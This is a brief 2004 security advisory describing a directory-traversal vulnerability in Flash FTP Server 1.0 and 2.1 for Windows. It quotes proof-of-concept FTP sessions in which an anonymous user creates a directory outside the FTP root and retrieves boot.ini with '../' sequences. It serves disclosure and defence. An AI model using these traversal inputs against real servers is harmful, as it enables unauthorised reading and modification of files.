Skip navigation

Directory Traversal Vulnerability in Flash FTP Server for Windows

Reported January 5, 2004 by dr insane.

 

 

VERSIONS AFFECTED

 

·        Flash FTP Server 1.0 and 2.1

 

DESCRIPTION

 

Flash FTP Server contains a directory-traversal vulnerability. By performing a simple process (as outlined in the demonstration below), an attacker can read or modify files and directories that reside anywhere on the vulnerable system.

 
DEMONSTRATION
 
The discoverer posted the following demonstration as proof of concept:

 

Creation of a directory outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.


Retrieving of a file outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini

 

VENDOR RESPONSE

 

NET2SOFT has been notified.

 

CREDIT

Discovered by dr_insane.

TAGS: Security
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish